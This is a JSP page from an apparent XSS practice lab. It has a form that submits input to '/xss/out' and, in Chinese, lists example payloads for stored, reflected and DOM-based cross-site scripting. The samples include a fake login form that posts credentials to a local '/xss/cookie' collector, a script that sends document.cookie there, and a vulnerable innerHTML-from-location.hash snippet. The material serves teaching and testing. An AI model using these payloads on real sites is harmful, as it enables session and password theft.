<!DOCTYPE html>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c"%>
<html>
<head>
    <title>tomas的测试页面</title>
</head>
<body>
  <h1>你好:世界</h1>

  <form action="/xss/out" method="post">
      <p>First name: <input type="text" style="width:450px;height: 100px;" name="xssStr" /></p>
      <input type="submit" value="Submit" />
  </form>
<div style="background-color: gainsboro ">
    <span>输入实例:</span>
    <ul>
         <li type="1">
             存贮型:
             <div>&lt;script&gt;document.body.innerHTML="&lt;h1&gt;PleaseLogin&lt;/h1&gt;</div>
             <div>&lt;form action=http://127.0.0.1:8080/xss/cookie method=post&gt;</div>
             <div>&lt;br&gt;User name:&lt;input type=text name=name&gt;&lt;br&gt;</div>
             <div>Password:&lt;input type=text name=password&gt;&lt;/p&gt;</div>
             <div>&lt;input type=submit name=login&gt;&lt;/form&gt;"&lt;/script&gt;</div>
         </li>
         <li type="1">
             反射型:
            <pre style="font-family:'Menlo';font-size:12.0pt;">
            <div> &lt;script&gt;document.write('&lt;img src="http://127.0.0.1:8080/xss/cookie?foo='+encodeURI(document.cookie)+'"/&gt;')&lt;/script&gt;</div>
            </pre>

         </li>

         <li type="1">
             基于DOM型XSS样例

             如下面请求的hash部分，由客户端JS动态执行产生XSS注入。
             http://www.webapp.com/example.jsp?param1=value1#\u003ciframe onload=alert('xss')\u003e

             <div>&nbsp; &nbsp;&lt;div id="m"&gt;&lt;/div&gt;</div>
             <div>&nbsp; &nbsp;&lt;script&gt;</div>
             <div>&nbsp; &nbsp; &nbsp; &nbsp;var y=location.hash.substring(1);</div>
             <div>&nbsp; &nbsp; &nbsp; &nbsp;document.getElementById("m").innerHTML = y;</div>
             <div>&nbsp; &nbsp;&lt;/script&gt;</div>

             动态生成
             <div id="m"></div>
             <span style="font-family: 宋体, simsun; line-height: 24.5px; text-indent: 28px; background-color: #ffffff;">&lt;div id="m"&gt;&lt;iframe onload="alert('xss')"&gt;&lt;/iframe&gt;&lt;/div&gt;</span><br />
             <p>&nbsp;</p>

         </li>
     </ul>
</div>

</body>
</html>
